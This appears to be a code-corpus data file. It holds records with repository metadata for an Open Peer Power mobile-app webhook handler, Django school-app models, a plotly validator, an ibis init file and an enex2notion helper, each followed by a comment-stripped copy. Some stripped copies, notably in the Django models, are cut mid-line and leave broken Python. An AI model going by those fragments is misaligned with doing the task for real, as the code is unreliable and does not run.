HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
{
vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
}
)
def validate_schema(schema):
if isinstance(schema, dict):
schema = vol.Schema(schema)
def wrapper(func):
@wraps(func)
async def validate_and_run(opp, config_entry, data):
try:
data = schema(data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
return await func(opp, config_entry, data)
return validate_and_run
return wrapper
async def handle_webhook(
opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
return Response(status=410)
config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
try:
req_data = await request.json()
except ValueError:
_LOGGER.warning("Received invalid JSON from mobile_app")
return empty_okay_response(status=HTTP_BAD_REQUEST)
if (
ATTR_WEBHOOK_ENCRYPTED not in req_data
and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
):
_LOGGER.warning(
"Refusing to accept unencrypted webhook from %s",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
try:
req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(req_data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
webhook_type = req_data[ATTR_WEBHOOK_TYPE]
webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
if req_data[ATTR_WEBHOOK_ENCRYPTED]:
enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
if webhook_type not in WEBHOOK_COMMANDS:
_LOGGER.error("Received invalid webhook type: %s", webhook_type)
return empty_okay_response()
_LOGGER.debug(
"Received webhook payload for type %s: %s", webhook_type, webhook_payload
)
return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
{
vol.Required(ATTR_DOMAIN): cv.string,
vol.Required(ATTR_SERVICE): cv.string,
vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
}
)
async def webhook_call_service(opp, config_entry, data):
try:
await opp.services.async_call(
data[ATTR_DOMAIN],
data[ATTR_SERVICE],
data[ATTR_SERVICE_DATA],
blocking=True,
context=registration_context(config_entry.data),
)
except (vol.Invalid, ServiceNotFound, Exception) as ex:
_LOGGER.error(
"Error when calling service during mobile_app "
"webhook (device name: %s): %s",
config_entry.data[ATTR_DEVICE_NAME],
ex,
)
raise HTTPBadRequest()
return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
{
vol.Required(ATTR_EVENT_TYPE): cv.string,
vol.Optional(ATTR_EVENT_DATA, default={}): dict,
}
)
async def webhook_fire_event(opp, config_entry, data):
event_type = data[ATTR_EVENT_TYPE]
opp.bus.async_fire(
event_type,
data[ATTR_EVENT_DATA],
EventOrigin.remote,
context=registration_context(config_entry.data),
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
{
str: {
vol.Required(ATTR_TEMPLATE): cv.template,
vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
}
}
)
async def webhook_render_template(opp, config_entry, data):
resp = {}
for key, item in data.items():
try:
tpl = item[ATTR_TEMPLATE]
attach(opp, tpl)
resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
except TemplateError as ex:
resp[key] = {"error": str(ex)}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
{
vol.Optional(ATTR_LOCATION_NAME): cv.string,
vol.Required(ATTR_GPS): cv.gps,
vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
vol.Optional(ATTR_BATTERY): cv.positive_int,
vol.Optional(ATTR_SPEED): cv.positive_int,
vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
vol.Optional(ATTR_COURSE): cv.positive_int,
vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
}
)
async def webhook_update_location(opp, config_entry, data):
opp.helpers.dispatcher.async_dispatcher_send(
SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
{
vol.Optional(ATTR_APP_DATA, default={}): dict,
vol.Required(ATTR_APP_VERSION): cv.string,
vol.Required(ATTR_DEVICE_NAME): cv.string,
vol.Required(ATTR_MANUFACTURER): cv.string,
vol.Required(ATTR_MODEL): cv.string,
vol.Optional(ATTR_OS_VERSION): cv.string,
}
)
async def webhook_update_registration(opp, config_entry, data):
new_registration = {**config_entry.data, **data}
device_registry = await dr.async_get_registry(opp)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
manufacturer=new_registration[ATTR_MANUFACTURER],
model=new_registration[ATTR_MODEL],
name=new_registration[ATTR_DEVICE_NAME],
sw_version=new_registration[ATTR_OS_VERSION],
)
opp.config_entries.async_update_entry(config_entry, data=new_registration)
return webhook_response(
safe_registration(new_registration),
registration=new_registration,
)
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
_LOGGER.warning(
"Refusing to enable encryption for %s because it is already enabled!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(
ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
)
if not supports_encryption():
_LOGGER.warning(
"Unable to enable encryption for %s because libsodium is unavailable!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
secret = secrets.token_hex(SecretBox.KEY_SIZE)
data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
opp.config_entries.async_update_entry(config_entry, data=data)
return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
vol.Lower, vol.In(COMBINED_CLASSES)
),
vol.Required(ATTR_SENSOR_NAME): cv.string,
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
vol.Optional(ATTR_SENSOR_UOM): cv.string,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
}
)
async def webhook_register_sensor(opp, config_entry, data):
entity_type = data[ATTR_SENSOR_TYPE]
unique_id = data[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key in opp.data[DOMAIN][entity_type]:
_LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
return error_response(
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
f"{entity_type} {unique_id} already exists!",
status=409,
)
data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
opp.data[DOMAIN][entity_type][unique_store_key] = data
try:
await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
except OpenPeerPowerError as ex:
_LOGGER.error("Error registering sensor: %s", ex)
return empty_okay_response()
register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE])
async_dispatcher_send(opp, register_signal, data)
return webhook_response(
{"success": True},
registration=config_entry.data,
status=HTTP_CREATED,
)
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
}
)
],
)
)
async def webhook_update_sensor_states(opp, config_entry, data):
resp = {}
for sensor in data:
entity_type = sensor[ATTR_SENSOR_TYPE]
unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key not in opp.data[DOMAIN][entity_type]:
_LOGGER.error(
"Refusing to update non-registered sensor: %s", unique_store_key
)
err_msg = f"{entity_type} {unique_id} is not registered"
resp[unique_id] = {
"success": False,
"error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
}
continue
entry = opp.data[DOMAIN][entity_type][unique_store_key]
new_state = {**entry, **sensor}
opp.data[DOMAIN][entity_type][unique_store_key] = new_state
safe = savable_state(opp)
try:
await opp.data[DOMAIN][DATA_STORE].async_save(safe)
except OpenPeerPowerError as ex:
_LOGGER.error("Error updating mobile_app registration: %s", ex)
return empty_okay_response()
async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)
resp[unique_id] = {"success": True}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
zones = [
opp.states.get(entity_id)
for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
]
return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
opp_config = opp.config.as_dict()
resp = {
"latitude": opp_config["latitude"],
"longitude": opp_config["longitude"],
"elevation": opp_config["elevation"],
"unit_system": opp_config["unit_system"],
"location_name": opp_config["location_name"],
"time_zone": opp_config["time_zone"],
"components": opp_config["components"],
"version": opp_config["version"],
"theme_color": MANIFEST_JSON["theme_color"],
}
if CONF_CLOUDHOOK_URL in config_entry.data:
resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
try:
resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
except opp.components.cloud.CloudNotAvailable:
pass
return webhook_response(resp, registration=config_entry.data)
| true | true |
f70ffb5653d4966b0c8c0eb7aea68ce4980e6d72 | 7,639 | py | Python | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | null | null | null | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | 3 | 2020-06-05T18:33:38.000Z | 2021-06-10T20:22:00.000Z | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
#------- Profile, Student, Teacher Model -------
## TODO Refactor CharField To Text Field Modify HTMl maxlength. WRONG USAGE!!! ALLL WRONG
class Profile(models.Model):
#username,first,last,email,password is extened from Django Auth User
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
street_address = models.CharField(max_length=200, blank=True)
city = models.CharField(max_length=100, blank=True)
state = models.CharField(max_length=100, blank=True)
zip_code = models.CharField(max_length=20, blank=True)
phone_number = models.CharField(max_length=20, blank=True)
emergency_contact = models.CharField(max_length=20, blank=True)
relationship = models.CharField(max_length=100, blank=True)
middle_name = models.CharField(max_length=50, blank=True)
birth_date = models.DateField(null=True, blank=True)
school_id = models.CharField(max_length=15,null=True, blank = True, default=0)
is_student = models.BooleanField('Student', default=False)
is_teacher = models.BooleanField('Teacher', default=False)
about = models.TextField(max_length=300, blank=True)
hobby = models.TextField(max_length=100, blank=True)
favorite_food = models.TextField(max_length=100, blank=True)
favorite_subject = models.TextField(max_length=100, blank=True)
def __str__(self):
if self.user == None:
return 'User deleted - ' + str(self.school_id)
else:
return self.user.get_full_name()
@receiver(post_save, sender=User)# Create a Profile when a User is create.
def create_profile_object(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
class Student(models.Model):
profile = models.OneToOneField(Profile, null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
# Course_taking = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='enrolled_Course')
# classroom_taking = models.ManyToManyField('Classroom',blank=True)
def __str__(self):
return 'Student: ' + str(self.user.get_full_name()) #change to string
class Teacher(models.Model):
profile = models.OneToOneField(Profile,null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL, related_name='teacher')
def __str__(self):
return 'Teacher: ' + str(self.user.get_full_name()) #change to string
# --------------- Course, Classroom, Lesson Plan and Department's Model----------------------
class Course(models.Model):
course_number = models.CharField(max_length=20,default='12345678')
abbreviated_title = models.CharField(max_length=150,default='')
course_title = models.CharField(max_length=250,default='') #,unique=True)
maximum_credit = models.CharField(max_length=10,default='')
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher_name = models.CharField(max_length=50,default='')
description = models.CharField(max_length=450,default='')
#Alert If related name is use in ForeignKey, _set cannot be use!
is_archive = models.BooleanField(default=False)
department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
# A Course is bound to the teacher and create a classroom upon creation. More room can be added later
class Lesson_plan(models.Model):
course_title = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
week_number = models.CharField(max_length=10,default='')
agenda = models.CharField(max_length=450,default='Agenda Goes Here')
monday_date = models.DateField(blank=True, null=True)
tuesday_date = models.DateField(blank=True, null=True)
wednesday_date = models.DateField(blank=True, null=True)
thursday_date = models.DateField(blank=True, null=True)
friday_date= models.DateField(blank=True, null=True)
monday_assignment = models.CharField(max_length=400,default='a')
tuesday_assignment= models.CharField(max_length=400,default='s')
wednesday_assignment= models.CharField(max_length=400,default='d')
thursday_assignment= models.CharField(max_length=400,default='f')
friday_assignment= models.CharField(max_length=400,default='g')
weekend_assignment = models.CharField(max_length=300,default='h')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
def __str__(self):
return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
course_title = models.CharField(max_length=50,default='')
course_number = models.CharField(max_length=20,default='')
teacher_name = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
room_number = models.CharField(max_length=10,default='TBA')
time = models.TimeField(blank=True,null=True)
description = models.CharField(max_length=300,default='TBA')
# Use for statement to get value
# Course = models.ManyToManyField(Course, blank=True)
is_archive = models.BooleanField(default=False)
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
student = models.ManyToManyField(Student, blank=True)
def __str__(self):
return 'Course: ' + self.course_title +' Room #: '+self.room_number
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
if created:
classroom = Classroom.objects.create(course_title=instance.course_title,course_id=instance.id, teacher_name=instance.teacher_name,
course=instance,teacher=instance.teacher,semester=instance.semester,year=instance.year)
# To Find the Classroom:
# teacher = Teacher.objects.filter(user=request.user)
# Course = Course.objects.filter(teacher_set=teacher, name ='Course_name')
# classroom = Classroom.objects.filter(teacher=teacher).filter(Course=Course)
class Department(models.Model):
description = models.CharField(max_length=450,default='Department Description')
name = models.CharField(max_length=75,default='', unique=True)
# Course = models.ManyToManyField('Course',blank=True)
teacher = models.ManyToManyField(Teacher,blank=True)
student = models.ManyToManyField(Student,blank=True)
def __str__(self):
return 'LC High School ' + self.name + ' department.'
| 51.268456 | 138 | 0.728629 | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
elete = models.SET_NULL)
street_address = models.CharField(max_length=200, blank=True)
city = models.CharField(max_length=100, blank=True)
state = models.CharField(max_length=100, blank=True)
zip_code = models.CharField(max_length=20, blank=True)
phone_number = models.CharField(max_length=20, blank=True)
emergency_contact = models.CharField(max_length=20, blank=True)
relationship = models.CharField(max_length=100, blank=True)
middle_name = models.CharField(max_length=50, blank=True)
birth_date = models.DateField(null=True, blank=True)
school_id = models.CharField(max_length=15,null=True, blank = True, default=0)
is_student = models.BooleanField('Student', default=False)
is_teacher = models.BooleanField('Teacher', default=False)
about = models.TextField(max_length=300, blank=True)
hobby = models.TextField(max_length=100, blank=True)
favorite_food = models.TextField(max_length=100, blank=True)
favorite_subject = models.TextField(max_length=100, blank=True)
def __str__(self):
if self.user == None:
return 'User deleted - ' + str(self.school_id)
else:
return self.user.get_full_name()
@receiver(post_save, sender=User)
def create_profile_object(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
class Student(models.Model):
profile = models.OneToOneField(Profile, null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
def __str__(self):
return 'Student: ' + str(self.user.get_full_name())
class Teacher(models.Model):
profile = models.OneToOneField(Profile,null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL, related_name='teacher')
def __str__(self):
return 'Teacher: ' + str(self.user.get_full_name())
class Course(models.Model):
course_number = models.CharField(max_length=20,default='12345678')
abbreviated_title = models.CharField(max_length=150,default='')
course_title = models.CharField(max_length=250,default='') #,unique=True)
maximum_credit = models.CharField(max_length=10,default='')
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher_name = models.CharField(max_length=50,default='')
description = models.CharField(max_length=450,default='')
#Alert If related name is use in ForeignKey, _set cannot be use!
is_archive = models.BooleanField(default=False)
department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
# A Course is bound to the teacher and create a classroom upon creation. More room can be added later
class Lesson_plan(models.Model):
course_title = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
week_number = models.CharField(max_length=10,default='')
agenda = models.CharField(max_length=450,default='Agenda Goes Here')
monday_date = models.DateField(blank=True, null=True)
tuesday_date = models.DateField(blank=True, null=True)
wednesday_date = models.DateField(blank=True, null=True)
thursday_date = models.DateField(blank=True, null=True)
friday_date= models.DateField(blank=True, null=True)
monday_assignment = models.CharField(max_length=400,default='a')
tuesday_assignment= models.CharField(max_length=400,default='s')
wednesday_assignment= models.CharField(max_length=400,default='d')
thursday_assignment= models.CharField(max_length=400,default='f')
friday_assignment= models.CharField(max_length=400,default='g')
weekend_assignment = models.CharField(max_length=300,default='h')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
def __str__(self):
return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
course_title = models.CharField(max_length=50,default='')
course_number = models.CharField(max_length=20,default='')
teacher_name = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
room_number = models.CharField(max_length=10,default='TBA')
time = models.TimeField(blank=True,null=True)
description = models.CharField(max_length=300,default='TBA')
# Use for statement to get value
# Course = models.ManyToManyField(Course, blank=True)
is_archive = models.BooleanField(default=False)
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
student = models.ManyToManyField(Student, blank=True)
def __str__(self):
return 'Course: ' + self.course_title +' Room
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
if created:
classroom = Classroom.objects.create(course_title=instance.course_title,course_id=instance.id, teacher_name=instance.teacher_name,
course=instance,teacher=instance.teacher,semester=instance.semester,year=instance.year)
# To Find the Classroom:
# teacher = Teacher.objects.filter(user=request.user)
# Course = Course.objects.filter(teacher_set=teacher, name ='Course_name')
# classroom = Classroom.objects.filter(teacher=teacher).filter(Course=Course)
class Department(models.Model):
description = models.CharField(max_length=450,default='Department Description')
name = models.CharField(max_length=75,default='', unique=True)
# Course = models.ManyToManyField('Course',blank=True)
teacher = models.ManyToManyField(Teacher,blank=True)
student = models.ManyToManyField(Student,blank=True)
def __str__(self):
return 'LC High School ' + self.name + ' department.'
| true | true |
f70ffb6cc9871e9b47e543f54c1311f5835fc889 | 476 | py | Python | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/scattergeo/marker/colorbar/_y.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
| 22.666667 | 63 | 0.556723 | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
| true | true |
f70ffe3f4ef711992da1362f8030fc7607809690 | 791 | py | Python | ibis/backends/pandas/execution/__init__.py | rtpsw/ibis | d7318fdf87121cd8fadbcf0369a2b217aab3053a | [
"Apache-2.0"
] | 1 | 2022-03-22T10:39:37.000Z | 2022-03-22T10:39:37.000Z | ibis/backends/pandas/execution/__init__.py | marlenezw/ibis | 14b9baf3e1021e8698e7f0ae3c0ae5747543431c | [
"Apache-2.0"
] | null | null | null | ibis/backends/pandas/execution/__init__.py | marlenezw/ibis | 14b9baf3e1021e8698e7f0ae3c0ae5747543431c | [
"Apache-2.0"
] | null | null | null | from ibis.backends.pandas.execution.arrays import * # noqa: F401,F403
from ibis.backends.pandas.execution.decimal import * # noqa: F401,F403
from ibis.backends.pandas.execution.generic import * # noqa: F401,F403
from ibis.backends.pandas.execution.join import * # noqa: F401,F403
from ibis.backends.pandas.execution.maps import * # noqa: F401,F403
from ibis.backends.pandas.execution.selection import * # noqa: F401,F403
from ibis.backends.pandas.execution.strings import * # noqa: F401,F403
from ibis.backends.pandas.execution.structs import * # noqa: F401,F403
from ibis.backends.pandas.execution.temporal import * # noqa: F401,F403
from ibis.backends.pandas.execution.timecontext import * # noqa: F401,F403
from ibis.backends.pandas.execution.window import * # noqa: F401,F403
| 65.916667 | 75 | 0.777497 | from ibis.backends.pandas.execution.arrays import *
from ibis.backends.pandas.execution.decimal import *
from ibis.backends.pandas.execution.generic import *
from ibis.backends.pandas.execution.join import *
from ibis.backends.pandas.execution.maps import *
from ibis.backends.pandas.execution.selection import *
from ibis.backends.pandas.execution.strings import *
from ibis.backends.pandas.execution.structs import *
from ibis.backends.pandas.execution.temporal import *
from ibis.backends.pandas.execution.timecontext import *
from ibis.backends.pandas.execution.window import *
| true | true |
f70ffe665af27588bbe9a0130f4ef97d24df0153 | 961 | py | Python | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 49 | 2021-12-12T04:13:24.000Z | 2022-03-31T12:58:57.000Z | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 11 | 2021-12-03T10:49:54.000Z | 2022-03-29T20:00:30.000Z | enex2notion/cli_wkhtmltopdf.py | starplanet/enex2notion | 3bd97112e8234b477a3d53c5461ce7a3ac55f7aa | [
"MIT"
] | 3 | 2022-02-04T13:25:21.000Z | 2022-03-07T17:54:36.000Z | import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf(): # pragma: no cover
if shutil.which("wkhtmltopdf") is None:
if platform.system() == "Windows":
wkhtmltopdf_path = _find_wkhtmltopdf_path()
if wkhtmltopdf_path and wkhtmltopdf_path.exists():
logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
return
logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
sys.exit(1)
def _find_wkhtmltopdf_path(): # pragma: no cover
import winreg # noqa: WPS433
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
return Path(winreg.QueryValueEx(key, "PdfPath")[0])
except FileNotFoundError:
return None
| 30.03125 | 87 | 0.667014 | import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf():
if shutil.which("wkhtmltopdf") is None:
if platform.system() == "Windows":
wkhtmltopdf_path = _find_wkhtmltopdf_path()
if wkhtmltopdf_path and wkhtmltopdf_path.exists():
logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
return
logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
sys.exit(1)
def _find_wkhtmltopdf_path():
import winreg
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
return Path(winreg.QueryValueEx(key, "PdfPath")[0])
except FileNotFoundError:
return None
| true | true |
f70ffe907544adc81b183974aedfca98b72ac20d | 2,936 | py | Python | forumdemo/article/views.py | lamdba0602/forumdemo | 82c6223d6b6d7fb3bac049e342d3048a5117a2b7 | [
"Apache-2.0"
